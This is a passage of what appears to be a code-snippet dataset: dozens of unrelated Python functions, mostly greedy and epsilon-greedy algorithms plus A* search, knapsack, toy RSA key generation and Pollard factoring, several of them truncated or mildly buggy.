self.assertEquals(obs_part, [['3', '1', '2']])\r\n\r\n # two buckets\r\n obs_part, obs_levels = greedy_partition({'1': 2,\r\n '2': 1,\r\n '3': 3}, 2)\r\n\r\n self.assertEquals(obs_levels, [3, 3])\r\n self.assertEquals(obs_part, [['3'], ['1', '2']])\r\n\r\n # larger input\r\n obs_part, obs_levels = greedy_partition({'1': 1, '2': 2, '3': 3,\r\n '4': 4, '5': 5, '6': 6}, 2)\r\n self.assertEquals(obs_levels, [11, 10])\r\n self.assertEquals(obs_part, [['6', '3', '2'], ['5', '4', '1']])", "def gen_greedy_surveys(nside=32, nexp=1, exptime=30., filters=['r', 'i', 'z', 'y'],\n camera_rot_limits=[-80., 80.],\n shadow_minutes=60., max_alt=76., moon_distance=30., ignore_obs='DD',\n m5_weight=3., footprint_weight=0.3, slewtime_weight=3.,\n stayfilter_weight=3., footprints=None):\n # Define the extra parameters that are used in the greedy survey. I\n # think these are fairly set, so no need to promote to utility func kwargs\n greed_survey_params = {'block_size': 1, 'smoothing_kernel': None,\n 'seed': 42, 'camera': 'LSST', 'dither': True,\n 'survey_name': 'greedy'}\n\n surveys = []\n detailer = detailers.Camera_rot_detailer(min_rot=np.min(camera_rot_limits), max_rot=np.max(camera_rot_limits))\n\n for filtername in filters:\n bfs = []\n bfs.append((bf.M5_diff_basis_function(filtername=filtername, nside=nside), m5_weight))\n bfs.append((bf.Footprint_basis_function(filtername=filtername,\n footprint=footprints,\n out_of_bounds_val=np.nan, nside=nside), footprint_weight))\n bfs.append((bf.Slewtime_basis_function(filtername=filtername, nside=nside), slewtime_weight))\n bfs.append((bf.Strict_filter_basis_function(filtername=filtername), stayfilter_weight))\n # Masks, give these 0 weight\n bfs.append((bf.Zenith_shadow_mask_basis_function(nside=nside, shadow_minutes=shadow_minutes,\n max_alt=max_alt), 0))\n bfs.append((bf.Moon_avoidance_basis_function(nside=nside, moon_distance=moon_distance), 0))\n\n bfs.append((bf.Filter_loaded_basis_function(filternames=filtername), 0))\n bfs.append((bf.Planet_mask_basis_function(nside=nside), 0))\n\n weights = [val[1] for val in bfs]\n basis_functions = [val[0] for val in bfs]\n surveys.append(Greedy_survey(basis_functions, weights, exptime=exptime, filtername=filtername,\n nside=nside, ignore_obs=ignore_obs, nexp=nexp,\n detailers=[detailer], **greed_survey_params))\n\n return surveys", "def greedy(self):\n # for each node, find the incoming link with the highest score.\n max_scores = {}\n max_sources = {}\n for source, target in self.iteredges():\n score = self.get_score(source, target)\n max_score = max_scores.get(target)\n if max_score is None or score > max_score:\n max_scores[target] = score\n max_sources[target] = source\n # then build a graph out of just these links.\n succs = dict((n, []) for n in self)\n for target, source in max_sources.items():\n succs[source].append(target)\n return Digraph(succs, self.get_score, self.get_label)", "def e_greedy_sampling(self, k_array, reward_array, number_slots):\n\n # successes and total draws\n success_count = reward_array.sum(axis=1)\n total_count = k_array.sum(axis=1)\n\n # ratio of successes vs total\n success_ratio = success_count / total_count\n\n # choosing best greedy action or random depending with epsilon probability\n if np.random.random() < self.epsilon:\n\n # returning random action, excluding best\n return np.random.choice(np.delete(list(range(number_slots)), np.argmax(success_ratio)))\n\n # else return best\n else:\n\n # returning best greedy action\n return np.argmax(success_ratio)", "def __call__(self, state, 
q_values):\n\n if self.policy_type == \"greedy\":\n is_greedy = True\n else:\n is_greedy = random.uniform(0, 1) > self.epsilon\n\n if is_greedy :\n # choose greedy action\n index_action = np.argmax(q_values[state])\n else:\n # get a random action\n index_action = random.randint(0,3)\n\n return actions_dict[index_action]", "def genKeys(p, q):\n n = p*q\n phi_of_n = (p-1)*(q-1)\n e = 0\n \n #find a e less than n that is coprime with phi(n)\n count=2\n while count:\n gcd = gcd_iter(phi_of_n,count)\n if gcd==1:\n e = count\n break\n count+=1\n \n # finding the mutiplicative inverse of e and phi(n)\n d = ext_Euclid(e,phi_of_n)\n\n #positive values of d\n if d<0:\n d = phi_of_n - d\n return n,e,d", "def OneByOneStrategy(I_list,box_list):\n SortedItems = quick_sort(I_list)\n lemon = []\n for i in box_list:\n for item in range(len(SortedItems)):\n if i.max_cap - i.curr_cap == 0:\n break\n if SortedItems[item].weight <= i.max_cap - i.curr_cap:\n if SortedItems[item] not in lemon:\n lemon.append(SortedItems[item])\n i.items_list.append(SortedItems[item])\n i.curr_cap += SortedItems[item].weight\n else:\n pass\n print('Results from Greedy Strategy 3')\n if len(lemon) != len(SortedItems):\n print('Unable to pack all items')\n else:\n print('All items successfully packed!')\n for s in box_list:\n print('Box',s.id,'of weight capacity',s.max_cap,'contains:')\n for item in s.items_list:\n print(item.name,'of weight',item.weight)\n for item in SortedItems:\n if item not in lemon:\n print(item.name,'of weight',item.weight,'got left behind')\n print('\\n')", "def choose_epsilon_greedy(self, state: Tuple[int, ...], valid_actions: Tuple[int, ...]) -> int:\n if random.random() < self.__epsilon:\n return self.choose_uniform(valid_actions)\n return self.choose_greedy(state, valid_actions)", "def epsilon_greedy(Q, epsilon, n_actions, s, train=False):\n if train or np.random.rand() < epsilon:\n action = np.argmax(Q[s, :])\n else:\n action = np.random.randint(0, n_actions)\n return action", "def greedy_learn_search(self,db,labels):\n queue = PriorityQueue()\n dolowmem = (self.lowmem == True)\n numidsets = 0\n root_ids = range(len(labels))\n queue.push((self.root,root_ids),len(labels))\n numnodes = 1\n deepest = 0\n err = 0\n while len(queue) > 0 and numnodes+2 <= self.maxnodes:\n #print \"%d nodes, priority %d\"%(numnodes,queue.nextkey())\n nerr = queue.nextkey()\n (node,trainingset) = queue.pop()\n #print \"Greedy learn\",len(trainingset)\n if trainingset is None:\n trainingset = self.identify_examples(db,labels,node)\n if node.depth >= self.maxdepth or len(trainingset) <= self.minexamples:\n #print \" Hit depth or training set limit\"\n node.pick_best_label(db,labels,trainingset)\n err += misclassification_error([labels[id] for id in trainingset])\n continue\n features = self.feature_subset(node,db,labels,trainingset)\n cost = node.pick_best_split(db,labels,trainingset,features)\n numidsets -= len(trainingset)\n #do a split\n if node.type == 'v':\n continue\n elif node.type == 's':\n #discrete split\n node.children = dict()\n #select sub-indices\n Eids = defaultdict(list)\n noneids = []\n for id in trainingset:\n v = db[node.feature,id]\n if v is None:\n #item doesn't exist, it's a missing value\n noneids.append(id)\n else:\n Eids[v].append(id)\n #determine whether to switch to low-memory mode\n if not dolowmem and self.lowmem=='auto':\n for v,vids in Eids.iteritems():\n numidsets += len(vids)+len(noneids)\n if numidsets > self.lowmem_threshold:\n print \"Decision tree learner switching to low-memory mode\"\n 
dolowmem = True\n trainingset = None\n\n\n numnodes += len(Eids)\n #print \"Split sizes\",[len(v) for v in Eids.itervalues()]\n #print \"None size\",len(noneids)\n for v,vids in Eids.iteritems():\n #print \"->\",len(vids),\"+\",len(noneids)\n #recurse\n c = DecisionTreeNode(node)\n node.children[v] = c\n err = misclassification_error([labels[id] for id in vids+noneids])\n cids = (None if dolowmem else vids+noneids)\n queue.push((c,cids),err)\n if c.depth > deepest:\n deepest = c.depth\n print \"Decision tree learner: Reached node with depth\",deepest\n else:\n #do an inequality split\n assert node.type == 'i',\"Got a weird type? \"+str(node.type)\n leftids = []\n rightids = []\n for id in trainingset:\n val = db[node.feature,id]\n if val is not None:\n if val <= node.value: leftids.append(id)\n else: rightids.append(id)\n else:\n leftids.append(id)\n rightids.append(id)\n if len(leftids)==0 or len(rightids)==0:\n print \"node feature \"+str(node.feature)+\" doesn't have a valid split value \"+str(node.value)\n vals = [db[node.feature,id] for id in trainingset if db[node.feature,id]!=None]\n print \"min,max of training set:\",min(vals),max(vals)\n print \"cost is\",cost\n raw_input()\n assert len(leftids) > 0 and len(rightids) > 0\n if not dolowmem and self.lowmem=='auto':\n numidsets += len(leftids) + len(rightids)\n if numidsets > self.lowmem_threshold:\n print \"Decision tree learner switching to low-memory mode\"\n dolowmem = True\n trainingset = None\n numnodes += 2\n c1 = DecisionTreeNode(node)\n c2 = DecisionTreeNode(node)\n node.children = {0:c1,1:c2}\n #print \"->\",len(leftids)\n #print \"->\",len(rightids)\n err1 = misclassification_error([labels[id] for id in leftids])\n err2 = misclassification_error([labels[id] for id in rightids])\n if dolowmem:\n leftids = None\n rightids = None\n queue.push((c1,leftids),err1)\n queue.push((c2,rightids),err2)\n if c1.depth > deepest:\n deepest = c1.depth\n print \"Decision tree learner: Reached node with depth\",deepest\n #end of recursion. 
for the rest of the nodes still in the queue, make them leaf nodes\n if len(queue) > 0:\n print \"%d nodes remaining in queue, setting to leaves\"%(len(queue),)\n for (node,trainingset) in queue:\n node.pick_best_label(db,labels,trainingset)\n err += misclassification_error([labels[id] for id in trainingset])\n return err", "def greedy_path():\n itinerary = []\n cities = all_cities(data_set)\n starting_city = randomize_city_start(cities.keys()) # start from a random city\n # print \"starting_city: %s\" % starting_city\n cities_visited = {}\n \n # iterate through all cities\n count = 1\n while True:\n possible_routes = []\n #distance = []\n # print \"starting_city: %s\" % starting_city\n for path in data_set:\n # we only start with city that we have assigned in starting_city\n if starting_city in path['city_start']:\n # we don't go to cities we have visited\n if path['city_end'] in cities_visited:\n continue\n else:\n # print \"path: \", path\n possible_routes.append(path) # add the city if not in the list\n \n if not possible_routes:\n break\n # append this to itinerary\n route = get_shortest_route(possible_routes)\n count += 1\n itinerary.append(route)\n # add this city to visited_cities list\n cities_visited[route[0]] = count\n starting_city = route[1]\n \n return itinerary", "def greedy_schedule(s, f, verbose=False):\n X = [False for p in range(n)]\n a = [(s[i], f[i]) for i in range(n)]\n count = 1\n X[count] = 1\n for i in range(2, n):\n if s[i] > f[X[count]]:\n count += 1\n X[count] = i\n\n \"\"\"after this loop, an entry in X will contain either the start time\n of a task (denoting that we should use it) or it will contain False,\n denoting that we should skip it.\"\"\"\n if verbose:\n set_of_classes = set([])\n for item in X:\n if item:\n set_of_classes.add(item)\n print set_of_classes", "def policies(self, QTable, epsilon, state, next_states, action_to_do): # Inspiration from https://www.geeksforgeeks.org/q-learning-in-python/?fbclid=IwAR1UXR88IuJBhhTakjxNq_gcf3nCmJB0puuoA46J8mZnEan_qx9hhoFzhK8\r\n num_actions = 5 # 5 actions-value, [moved_out, into_goal, send_opp_home, send_self_home, move_token] \r\n def epsilonGreedyPolicy(): \r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n valid_act_len = len(np.where(valid_actions==True)[0])\r\n\r\n Action_probabilities = np.ones(num_actions, dtype = float) * epsilon / valid_act_len # divides probability based on number of valid actions and epsilon (each 0.025 if 4 actions) \r\n Action_probabilities = np.multiply(Action_probabilities, valid_actions)\r\n\r\n # If same values in QTable choose random valid action \r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n Action_probabilities[best_action] += (1.0 - epsilon) # Assigns rest probability to best action so probability sums to 1\r\n\r\n return Action_probabilities \r\n\r\n def greedyPolicy():\r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n\r\n Action_probabilities = np.zeros(num_actions, dtype = float)\r\n\r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # 
Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n\r\n Action_probabilities[best_action] += 1.0\r\n return Action_probabilities\r\n\r\n\r\n if(self.__chosenPolicy == \"epsilon greedy\"):\r\n return epsilonGreedyPolicy \r\n if(self.__chosenPolicy == \"greedy\"):\r\n return greedyPolicy", "def Pollard_pm1(n, primes, max_B=1000000):\n B = 10\n g = 1\n while B < max_B and g < n:\n a = randint(2, n - 2)\n g = gcd(a, n)\n if g != 1:\n return g\n for p in primes:\n if p >= B:\n break\n pd = 1 # p^d\n while pd * p <= B:\n pd *= p\n a = powmod(a, pd, n)\n g = gcd(a - 1, n)\n if g != 1 and g != n:\n return g\n B *= 2\n return 1", "def make_epsilon_greedy_policy(self, Q, epsilon, nA):\n\n def policy_fn(observation,p):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q=Q(observation,p)\n\n best_action = np.argmax(q)\n print(\"action called:\",self.env.action_labels[best_action])\n A[best_action] += (1.0 - epsilon)\n return A\n\n return policy_fn", "def rnd_pset(self):\n\t\treturn [rnd() * 10, rnd() * 10, rnd() * 12 * 15, rnd() * 12 * 15]", "def greedy_policy(self):\n # print(self.weights)\n policy = defaultdict(lambda: 0)\n\n for entry, values in self.weights.items():\n policy[entry] = np.argmax(self.weights[entry])\n # print(policy)\n\n return policy", "def select_greedy(self,time,a1,a2,*args):\n\t\tareas = []\n\t\tareas.append(a1)\n\t\tareas.append(a2)\n\t\tareas.extend(args)\n\t\tareas_sorted = sorted(areas,reverse=True)\n\t\tresult = []\n\t\tcandidates = [[wait[time][1] if wait[time]!=None else None \\\n\t\t\t\t\t for wait in area.w] for area in areas]\n\t\tused_content = set()\n\t\tfor area,cands in zip(areas_sorted,candidates):\n\t\t\tcands.sort(reverse=True)\n\t\t\tfor i in range(len(cands)):\n\t\t\t\tif cands[i] == None:\n\t\t\t\t\tresult.append((area,None))\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tif cands[i].id not in used_content:\n\t\t\t\t\t\tresult.append((area,cands[i]))\n\t\t\t\t\t\tused_content.add(cands[i].id)\n\t\t\t\t\t\tbreak\n\t\tprint \"greedy best solution:\",result\n\t\tprint \"greedy best cost:\",sum([x.weight*y.value if y!= None \\\n\t\t\t\t\t\t\t\t\telse 0 for x,y in result])", "def p_to_q_storey_tibshirani(pvalues, display_on=False, cut1s=False, set_pi_hat=False):\n # because fisher's exact test gives highly skewed pvalue dists (with P of 1)\n # it may be necessary to remove the 1s before analysing\n if cut1s:\n pvalues = [ps for ps in pvalues if ps < 1]\n\n # order p-values:\n pvalues.sort()\n\n # estimate pi0:\n # evaluate pi0 across the range of lambda:\n lamrange = np.arange(0,0.95,0.01)\n #pbeaters = [ sum( p > lam for p in pvalues) for lam in lamrange ]\n #denominator = [ (len(pvalues) * (1 - lam)) for lam in lamrange ]\n pi0_lam = [ (sum( p > lam for p in pvalues) / (len(pvalues) * (1 - lam))) for lam in lamrange ]\n #pi0_hardway = []\n\n #for i in range(len(pbeaters)):\n # pi0_hardway += [ pbeaters[i] / denominator[i] ]\n #if pi0_lam != pi0_hardway:\n # print \"\\n\\n\\npi0_lam is not the same as pi0_hardway!\\n\\n\"\n #print \"pi0_hardway length:\", len(pi0_hardway)\n #print \"p_values size:\", len(pvalues)\n # fit cubic spline to data, then calculate value of pi0 for lambda = 1:\n tck = interpolate.splrep(lamrange, pi0_lam, s=3)\n splinecurve = interpolate.splev(np.arange(0,1.0,0.01), tck, der=0)\n pi0_hat = interpolate.splev(1, 
tck, der=0)\n tck_half = 0\n if pi0_hat > 1:\n tck_half = interpolate.splrep(lamrange[:85], pi0_lam[:85], s=3)\n spline_half = interpolate.splev(np.arange(0,1.0,0.01), tck_half, der=0)\n pi0_hat_half = interpolate.splev(1, tck_half, der=0)\n pi0_hat = pi0_hat_half\n verbalise(\"R\", \"pi0_hat > 1! Likely skewed P-value distribution. Converting to \", pi0_hat_half)\n if set_pi_hat:\n pi0_hat = set_pi_hat\n if display_on:\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n try:\n n, bins, patches = ax1.hist(pvalues, bins=20, facecolor='green', label=\"P-values\")\n except IndexError:\n ax1.plot(pvalues)\n plt.title('distribution of P-values')\n ax1.set_xlabel('lambda / P-value')\n ax1.set_ylabel('distribution #')\n plt.legend(loc=4)\n ax2 = ax1.twinx()\n ax2.plot(lamrange, pi0_lam, 'ro', np.arange(0,1.0,0.01), splinecurve, 'r', label='pi0_hat, s=3' )\n if tck_half != 0:\n ax2.plot(lamrange[:95], spline_half[:95], 'b', label='lambda < 0.85')\n ax2.set_ylabel('pi0_hat(lambda)')\n #ax1.plot(t, s1, 'b-')\n plt.legend(loc=1)\n plt.show()\n\n\n q_pm = pi0_hat * pvalues[-1] # q(pm)\n # creates an ordered list of q(p(i)) values.\n q_pi_list = [q_pm] + [ (pi0_hat * len(pvalues)*pvalues[i])/i for i in range(len(pvalues)-1,1,-1)]\n # \"The estimated q value for the ith most significant feature is q(p(i))\"\n q_val = {}\n for i in range(len(pvalues)):\n q_val[pvalues[-1 * (i+1)]] = min(q_pi_list[:i+1])\n\n return q_val", "def _compute_next_all_q_values(self, next_time_steps, info):\n network_observation = next_time_steps.observation\n\n if self._observation_and_action_constraint_splitter is not None:\n network_observation, _ = self._observation_and_action_constraint_splitter(\n network_observation)\n\n next_target_q_values, _ = self._target_q_network(\n network_observation, step_type=next_time_steps.step_type)\n #batch_size = (\n # next_target_q_values.shape[0] or tf.shape(next_target_q_values)[0])\n #dummy_state = self._target_greedy_policy.get_initial_state(batch_size)\n # Find the greedy actions using our target greedy policy. 
This ensures that\n # action constraints are respected and helps centralize the greedy logic.\n #greedy_actions = self._target_greedy_policy.action(\n # next_time_steps, dummy_state).action\n\n return next_target_q_values", "def ghost_greedy(self,current,ghost,g_pos):\n x, y, pos ,(st,b),start,p_prob = g_pos[ghost]\n node = self.nodes_array[x][y].getNeighborByDirection(pos)\n if st > 0 and b and node is not None:\n st = max(st-1,0)\n return [(1,(node.i,node.j,pos,(st,not b),start,p_prob))]\n\n rpos = Actions.reverseDirection(pos)\n node = self.nodes_array[x][y]\n priority = [Directions.NORTH, Directions.WEST, Directions.SOUTH, Directions.EAST]\n node_neig = [node.up, node.left, node.down, node.right]\n prio = list()\n nodes = list()\n for i in range(len(node_neig)):\n if node_neig[i]:\n prio.append(priority[i])\n nodes.append((node_neig[i].i,node_neig[i].j))\n\n if len(prio) > 1 and rpos != Directions.STOP:\n for i in range(len(prio)):\n if prio[i] == rpos:\n del prio[i]\n del nodes[i]\n break\n\n arg = min if st == 0 else max\n dist_list = [manhattanDistance(pos, (current.i,current.j)) for pos in nodes]\n ptr_val = arg(dist_list)\n pos = []\n st = st - 1 if st - 1 > 0 else 0\n for i in range(len(dist_list)):\n if dist_list[i] == ptr_val:\n if not st:\n pos.append((nodes[i][0],nodes[i][1],prio[i],(0,False),start,p_prob))\n else:\n pos.append((x,y,prio[i],(st,True),start,p_prob))\n\n pos_p = 1./len(pos)\n return [(pos_p,possibility) for possibility in pos]", "def play_epsilon_greedy_policy(self, board):\n policy = np.random.choice(['random', 'q_agent'], 1, p=[self.epsilon, 1-self.epsilon])[0]\n if policy == 'random':\n move, _ = RandomAgent.play(board)\n else:\n move, q_value = self.play(board)\n self.after_move()\n return move, policy", "def astar(grid, heuristic):\r\n\r\n print (grid.getStart())\r\n frontier = PriorityQueue()\r\n frontierCpy = {}\r\n\r\n goal = grid.getGoals()[0]\r\n\r\n startX = grid.getStart()[0]\r\n startY = grid.getStart()[1]\r\n startNode = Node(((startX, startY), 0), None)\r\n\r\n init_heu = heuristic(startNode.cell[0], goal)\r\n frontierCpy[startNode.cell[0]] = init_heu\r\n frontier.put((init_heu, 0, startNode))\r\n\r\n while frontier.qsize() != 0:\r\n tup = frontier.get()\r\n\r\n currNode = tup[2]\r\n currG = tup[1] * -1\r\n grid.addVisited(currNode.cell[0])\r\n frontierCpy.pop(currNode.cell[0], None)\r\n\r\n if currNode.cell[0] == goal:\r\n path = []\r\n while currNode != None:\r\n path.insert(0, currNode.cell[0])\r\n currNode = currNode.parent\r\n grid.setPath(path)\r\n return path\r\n\r\n\r\n neighbors = grid.getNeighbors(currNode.cell[0])\r\n\r\n for n in neighbors:\r\n if n[0] not in grid.getVisited():\r\n newNode = Node(n, currNode)\r\n\r\n h = heuristic(n[0], goal)\r\n\r\n oneStepCost = n[1]\r\n g = oneStepCost + currG\r\n if n[0] not in frontierCpy or frontierCpy[n[0]] > h + g:\r\n frontier.put((h+g, -1*g, newNode))\r\n frontierCpy[n[0]] = h+g\r\n print(\"CANT FIND A PATH\")", "def main(num_q: int, point_list: List[int])-> int:\n dp_table", "def greedy_cliques(cliques,clusters,matrix):\n if len(clusters) == 0:\n return cliques\n cid = random.choice(range(len(clusters)))\n cluster0 = clusters.pop(cid)\n pid = random.choice(range(len(cluster0)))\n p0 = cluster0.pop(pid)\n clique = [p0]\n \n for cid,cluster in enumerate(clusters):\n dist = float('-Inf')\n idx = 0\n for i,p in enumerate(cluster):\n d = sum([matrix[p.id][c.id] for c in clique])\n if d > dist:\n dist = d\n idx = i\n item = cluster.pop(idx)\n clique.append(item)\n if len(cluster) <= 0:\n 
clusters.pop(cid)\n if len(cluster0) > 0:\n clusters.append(cluster0)\n cliques.append(clique)\n return greedy_cliques(cliques,clusters,matrix)", "def greedy_MAP_assignment(theta,random_runs = 10,heur = 'first'):\r\n N = theta.shape[0]\r\n scipy.random.seed()\r\n max_p = -scipy.inf\r\n for k in range(random_runs):\r\n A = scipy.random.randint(2,size = N)\r\n improved = True\r\n p = A.dot( theta.dot(A) )\r\n while improved:\r\n improved = False\r\n if heur == 'first':\r\n p2 = -scipy.inf\r\n perm = scipy.random.permutation(N)\r\n for s in perm:\r\n #dp: change in p if A[i] bit is reversed\r\n dp = (1-2*A[s])*( A.dot(theta[s,:]+ theta[:,s]) ) + theta[s,s]\r\n if dp>0:\r\n p2 = dp\r\n break\r\n\r\n if heur == 'best':\r\n dp = (1-2*A)*( A.dot(theta + theta.T) ) + scipy.diag(theta)\r\n p2,s = dp.max(), dp.argmax()\r\n if p2 > 0:\r\n A[s] = 1-A[s]\r\n improved = True\r\n p += p2\r\n if p>max_p:\r\n greedy_A,max_p = A.copy(),p\r\n return greedy_A.astype(int),max_p", "def EpsGreedy(self, actions, game_state):\n if random.random() < self.epsilon:\n return random.choice(actions)\n else:\n return self.best_action(actions, game_state)", "def make_epsilon_greedy_policy(estimator, epsilon, nA):\n def policy_fn(observation):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q_values = estimator.predict(observation)\n# print(q_values)\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def gen_greedy_surveys(nside, nexp=1, target_map=None):\n norm_factor = calc_norm_factor(target_map)\n # Let's remove the bluer filters since this should only be near twilight\n filters = ['r', 'i', 'z', 'y']\n surveys = []\n\n detailer = detailers.Camera_rot_detailer(min_rot=-87., max_rot=87.)\n\n for filtername in filters:\n bfs = []\n bfs.append(bf.M5_diff_basis_function(filtername=filtername, nside=nside))\n bfs.append(bf.Target_map_basis_function(filtername=filtername,\n target_map=target_map[filtername],\n out_of_bounds_val=np.nan, nside=nside,\n norm_factor=norm_factor))\n bfs.append(bf.Slewtime_basis_function(filtername=filtername, nside=nside))\n bfs.append(bf.Strict_filter_basis_function(filtername=filtername))\n # Masks, give these 0 weight\n bfs.append(bf.Zenith_shadow_mask_basis_function(nside=nside, shadow_minutes=60., max_alt=76.))\n bfs.append(bf.Moon_avoidance_basis_function(nside=nside, moon_distance=40.))\n\n bfs.append(bf.Filter_loaded_basis_function(filternames=filtername))\n bfs.append(bf.Planet_mask_basis_function(nside=nside))\n\n weights = np.array([3.0, 0.3, 3., 3., 0., 0., 0., 0.])\n surveys.append(Greedy_survey(bfs, weights, block_size=1, filtername=filtername,\n dither=True, nside=nside, ignore_obs='DD', nexp=nexp,\n detailers=[detailer]))\n\n return surveys", "def generate_keys(self):\n\n\t\tcondition = False\n\t\t\n\t\t\t\n\t\twhile (not condition) :\n\t\t\t# step 1 : chose random primary numbers p and q\n\t\t\tn = generate_prime(self.min_bound,self.max_bound)\n\t\t\tself._p = n\n\t\t\tn = generate_prime(self.min_bound,self.max_bound)\n\t\t\twhile(n == self._p):\n\t\t\t\tn = generate_prime(self.min_bound,self.max_bound)\n\t\t\tself._q = n\n\n\t\t\t#step 2 : compute n = pq\n\t\t\tself.n = self._p * self._q\n\t\t\t\n\t\t\ta = find_invpow(self.n,4) // 3\n\t\t\tcondition = (self._p > self._q) and (self._p < 2 * self._q)\n\t\t\tif (not condition) :\n\t\t\t\tcontinue\n\n\t\t\tprint(\"step one OK\")\n\n\t\t\t#step 3 : compute phi(n)\n\t\t\tself._phi = (self._p - 1) * (self._q - 1)\n\n\t\t\t#step 4 : chose the exponent\n\t\t\tn = 
randint(100,a)\n\t\t\twhile (gcd(self._phi,n) != 1):\n\t\t\t\tn = randint(100,self._phi)\n\t\t\tself._d = n\n\n\t\t\t#step 5 : compute d (private key)\n\t\t\tself.e = euclide_algorithm(self._d, self._phi)[\"U\"] % self._phi\n\n\t\t\tcondition = (self._d < a)\n\n\t\tprint(\"p = \", self._p)\n\t\tprint(\"q = \", self._q)\n\t\tprint(\"d = \", self._d)", "def gen_primes():\n D = defaultdict(list)\n q = 2\n while True:\n if q not in D:\n\n yield q \n D[q * q] = [q]\n else:\n for p in D[q]:\n D[p + q].append(p)\n del D[q]\n q += 1", "def useLottery(ipSet):\n\t# make list of possible predicates and remove duplicates\n\tpredicates = [ip.predicate for ip in ipSet]\n\tseen = set()\n\tseen_add = seen.add\n\tpredicates = [pred for pred in predicates if not (pred in seen or seen_add(pred))]\n\n\t#choose the predicate\n\tweightList = np.array([pred.num_tickets for pred in predicates])\n\ttotalTickets = np.sum(weightList)\n\tprobList = np.true_divide(weightList, totalTickets)\n\tchosenPred = np.random.choice(predicates, p=probList)\n\n\t#choose the item and then ip\n\tchosenPredSet = ipSet.filter(predicate=chosenPred)\n\titem = chooseItem(chosenPredSet)\n\tchosenIP = ipSet.get(predicate=chosenPred, item=item)\n\n\tchosenIP.predicate.award_ticket()\n\n\treturn chosenIP", "def get_next_gp(self):\n raise NotImplementedError('Abstract Method')", "def get_greedy(self, v):\n policy = np.empty(v.shape, dtype=int)\n for i in range(self.N):\n for j in range(self.N):\n v1 = self.theta[i] + self.epsilon[j] + self.beta * v[i, j]\n v2 = (self.theta[i] + self.G_mean + self.beta *\n np.dot(v[i, :], self.G_probs))\n v3 = (self.G_mean + self.F_mean + self.beta *\n np.dot(self.F_probs, np.dot(v, self.G_probs)))\n if v1 > max(v2, v3):\n action = 1\n elif v2 > max(v1, v3):\n action = 2\n else:\n action = 3\n policy[i, j] = action\n\n return policy", "def knapsack_greedy(vals: List[float], weights: List[int],\n cap: int) -> Set[int]:\n # Check whether the input arrays are None or empty\n if not vals:\n return set()\n # Check whether the input capacity is non-negative\n if cap < 0:\n return set()\n\n items = [Item(i, info[0], info[1]) for i, info in enumerate(zip(vals, weights))]\n\n included1, total_val1 = _greedy_packing(\n items, cap, func=lambda x: x.val / x.weight\n )\n\n included2, total_val2 = _greedy_packing(items, cap, func=lambda x: x.val)\n\n if total_val1 >= total_val2:\n return included1\n else:\n return included2\n # Overall running time complexity: O(nlog n)", "def createEpsilonGreedyPolicy(Q, epsilon, num_actions):\n def policyFunction(state):\n\n Action_probabilities = np.ones(num_actions,\n dtype = float) * epsilon / num_actions\n\n best_action = np.argmax(Q[state])\n Action_probabilities[best_action] += (1.0 - epsilon)\n return Action_probabilities\n\n return policyFunction", "def frechet(P, Q):\n p = len(P)\n q = len(Q)\n\n mdist = eucl_dist_traj(P, Q)\n P_dist = [eucl_dist(P[ip], P[ip + 1]) for ip in range(p - 1)]\n Q_dist = [eucl_dist(Q[iq], Q[iq + 1]) for iq in range(q - 1)]\n\n cc = compute_critical_values(P, Q, p, q, mdist, P_dist, Q_dist)\n eps = cc[0]\n while (len(cc) != 1):\n m_i = len(cc) / 2 - 1\n eps = cc[m_i]\n rep = decision_problem(P, Q, p, q, eps, mdist, P_dist, Q_dist)\n if rep:\n cc = cc[:m_i + 1]\n else:\n cc = cc[m_i + 1:]\n frech = eps\n return frech", "def a_star_ng(graph, heuristic, start, goal):\n path = []\n queue = PriorityQueue()\n queue.put((0, start))\n visited = set(start)\n\n branch = {}\n found = False\n while not queue.empty():\n item = queue.get()\n current_cost = item[0]\n 
current_node = item[1]\n\n if current_node == goal:\n print('Found a path.')\n found = True\n break\n else:\n for next_node in graph[current_node]:\n cost = graph.edges[current_node, next_node]['weight']\n new_cost = current_cost + cost + heuristic(next_node, goal)\n\n if next_node not in visited:\n visited.add(next_node)\n queue.put((new_cost, next_node))\n\n branch[next_node] = (new_cost, current_node)\n\n path = []\n path_cost = 0\n if found:\n # retrace steps\n path = []\n n = goal\n path_cost = branch[n][0]\n path.append(goal)\n while branch[n][1] != start:\n path.append(branch[n][1])\n n = branch[n][1]\n path.append(branch[n][1])\n # Wanted the sets to have ints, but had floats, so casted them to int\n path = [(int(p[0]), int(p[1])) for p in path]\n return path[::-1], path_cost", "def find():\n b = 0\n q = 0\n while b == q:\n seq = [randint(-10, 10) for _ in range(randint(15, 30))]\n b, b_at = brute_force(seq)\n q = solution(seq)\n print(seq, b, q, b_at)", "def apriori(q, q_pvalue, insig, sig):\r\n\r\n insignificant = [] + insig\r\n significant = [] + sig\r\n\r\n while len(q) > 0:\r\n element = q[0]\r\n if isinstance(element, int):\r\n element = tuple([element]) # it easier to just convert this to a tuple (so everything is the same data type)\r\n\r\n pvalue = q_pvalue[element] # chi-squared test, verify if the given element satisfies the support criterion\r\n\r\n if pvalue == 1:\r\n significant.append(element)\r\n #print significant\r\n for i in range(element[-1]+1,4):\r\n if i not in insignificant:\r\n #print i, \"#####\", element\r\n tentativeCandidate = tuple(sorted(list(element)+[i])) # add the two lists together (element is a list)\r\n if tentativeCandidate not in q and tentativeCandidate not in significant: # then add it to the queue\r\n #print \"Queue {}\\nTentative Candidate{}\\nSignificant {}\\nInsignicant {}\\n\" \\\r\n # \"##################################\".format(q,tentativeCandidate,significant,insignificant)\r\n 